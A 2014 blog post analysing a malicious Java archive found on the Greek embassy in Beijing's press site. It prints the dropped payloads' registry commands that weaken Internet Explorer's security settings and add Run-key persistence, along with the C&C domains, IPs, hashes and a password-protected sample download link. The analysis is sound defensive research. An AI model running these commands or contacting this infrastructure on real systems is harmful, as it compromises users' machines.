Friday, June 20, 2014

Blitzanalysis: Embassy of Greece Beijing - Compromise

It's friday afternoon, I had a bit of free time and stumbled across this tweet by PhysicalDrive0 (thx!) two hours ago and thought to give it a try to finally add a new article to this Blog (first of 2014):

https://twitter.com/PhysicalDrive0/status/479921770838102017

So, I went to Google to search for the domain of the Embassy of Greece Beijing and added the (allegedly) malicious java file package that was found by PhysicalDrive0:


URL: http://www.grpressbeijing.com/1.jar (malicious!)

Next, I loaded the 1.jar file into Java Decompiler to get the source code. It showed, that the functionality is obfuscated in some way, e.g. the function csfn(String paramString) decrypts all strings by "removing" the numbers of the string parameter:

Figure 1: Simple string (de)obfuscation

csfn("64s33333e3333t333S55e666c777u5r333i534t76y2M34a55n76a88g666e44r2222") -> setSecurityManager

There are some other obfuscation techniques, but they are not important here. Instead, the following deobfuscated code line in the function init() gives us an idea where the actual payload is located:

Resp localResp = new Resp(csfn("234p34a55445c43654k632434234235")); -> pack

We can also see, that the java package contains a file named pack, so we open 7-Zip and unpack the file. A quick view with a PE viewer showed, that it is a x86 PE executable not even encrypted (SHA256: b832e4b5a4829c8df6de7b42c5cb32ef25b5ab59072b4c2a7838404cd0dd5e5f):

Figure 2: Payload inside Java package
Figure 3: Payload inside PE viewer


So, I opened IDA Pro to take a quick look at the functionality. Together with the strings of the executable, we get a brief idea of what the purpose of this malware is. The important strings are as follows:

SELECT * FROM AntiVirusProduct
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v PrivDiscUiShown /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DEPOff /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DisableFirstRunCustomize /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v Check_Associations /t REG_SZ /d  no  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v ShownVerifyBalloon /t REG_DWORD /d  3  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v Enabled /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnOnPostRedirect /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnonZoneCrossing /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v AutoRecover /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v Completed /t REG_BINARY /d  1  /f
\cmd.exe


Together with the output of IDA Pro, we can see that this malware uses the command line tool cmd.exe for adding several registry keys to Internet Explorer. It also tries to retrieve possible AntiVirus information by using the COM interface (dc12a687-737f-11cf-884d-00aa004b2e24 -> IWbemLocator -> SELECT * FROM AntiVirusProduct). Furthermore, it makes use of the COM to launch an instance of Internet Explorer (d30c1661-cdaf-11d0-8a3e-00c04fc9e26e -> IWebBrowser2), supposedly to contact its C&C server. To verify this, we open up Wireshark and run the executable. As a result, we get the following network information:

C&C server: defense.miraclecz.com (IP: 208.115.124.83)
HTTP GET request: /index.asp?id=50100

Also, we see that it downloads some kind of data (Base64 encoded). But first, we combine the C&C server and the HTTP request and open the URL in our favorite Browser:

Figure 4: Base64 encoded (2nd) Payload
URL: defense.miraclecz.com/index.asp?id=50100

As you can see, there is a string named microsoft followed by Base64 encoded data. Side note: Is there also a Linux equivalent?

Next, we copy the Base64 encoded data and go to the following website to let us decode it into a file (because I had the feeling it's just another unencrypted executable):

http://www.motobit.com/util/base64-decoder-encoder.asp

As a result, we get another executable (SHA256: a4863f44f48d1c4c050dd7baad767a86b348dd4d33924acf4e0a3cd40c6ae29f) that was only Base64 encoded and not encrypted in any way:

Figure 5: Downloaded Payload


So again, we fire up our PE viewer and take a look at the important strings:

http://buy.miraclecz.com
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DEPOff /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DisableFirstRunCustomize /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v Check_Associations /t REG_SZ /d  no  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v ShownVerifyBalloon /t REG_DWORD /d  3  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v Enabled /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnOnPostRedirect /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnonZoneCrossing /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v AutoRecover /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v Completed /t REG_BINARY /d  1  /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"  /v spoolsv.exe /t REG_SZ /d  %%temp%%\spoolsv.exe  /f
spoolsv.exe
Software\Microsoft\Windows\CurrentVersion\Run
open file fail
cmd timeout error %d
Run cmd error %d
cmd.exe /c %s>%s
%s%d.txt
open file error
%temp%
%s%s.ini
myWObject
\cmd.exe
!DOCTYPE html
%s/?id1=blank%d&id2=%d%d
%s/?id1=%d%d


Again, we load the executable into IDA Pro and quickly fly over the assembly code to get an idea of the functionality. Once again, it creates several registry entries with the help of the command line tool and creates an instance of the Internet Explorer (CoCreateInstance() -> d30c1661-cdaf-11d0-8a3e-00c04fc9e26e) for contacting the C&C server. This time, the network information is as follows:

C&C server: buy.miraclecz.com (IP: 74.121.191.33)
URL parameters (from strings of executable):
%s/?id1=blank%d&id2=%d%d
%s/?id1=%d%d

From the code we can see, that the sample has also the ability to encode/decode data from/to Base64. The dynamic analysis showed the malware sample contacted the C&C server, but wasn't sending any URL parameters (id1, id2). Also the server didn't respond...

The files can be downloaded here: https://www.dropbox.com/s/ckr7p5kka62cc7s/Embassy%20of%20Greece%20-%20Beijing.zip
Password: "infected" (without "")

That's it, have a nice weekend...
Share:

2 comments:

  1. Plz reupload the samples, the links are dead.

    ReplyDelete
  2. Thanks for pointing out! Curiously, the link was changed... (by Dropbox? oO)

    ReplyDelete